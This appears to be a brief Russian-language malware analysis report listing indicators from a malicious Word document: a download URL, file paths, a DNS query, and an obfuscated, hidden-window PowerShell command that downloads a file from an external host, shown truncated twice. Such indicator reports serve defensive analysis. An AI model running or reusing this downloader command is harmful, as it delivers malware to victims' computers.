Техническая информация
- http://fortycooola.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^owe^r^She^lL.eXe -E^x^EC^UTIONPOLIcY by^PAs^S^ -^No^pr^OF^I^L^e ^-w^iN^Dowsty^le^ hid^d^En (N^eW^-obje^C^t SY^sTEm.^n^ET.WebcLie^Nt)^.D^OWNl^oadf^I^L^e('http://fortycoool...
- %TEMP%\word\<Имя файла>.doc
- %TEMP%\word\<Имя файла>.doc
- DNS ASK fo###cooola.top
- '<SYSTEM32>\cmd.exe' /c "p^owe^r^She^lL.eXe -E^x^EC^UTIONPOLIcY by^PAs^S^ -^No^pr^OF^I^L^e ^-w^iN^Dowsty^le^ hid^d^En (N^eW^-obje^C^t SY^sTEm.^n^ET.WebcLie^Nt)^.D^OWNl^oadf^I^L^e('http://fortycoool...' (со скрытым окном)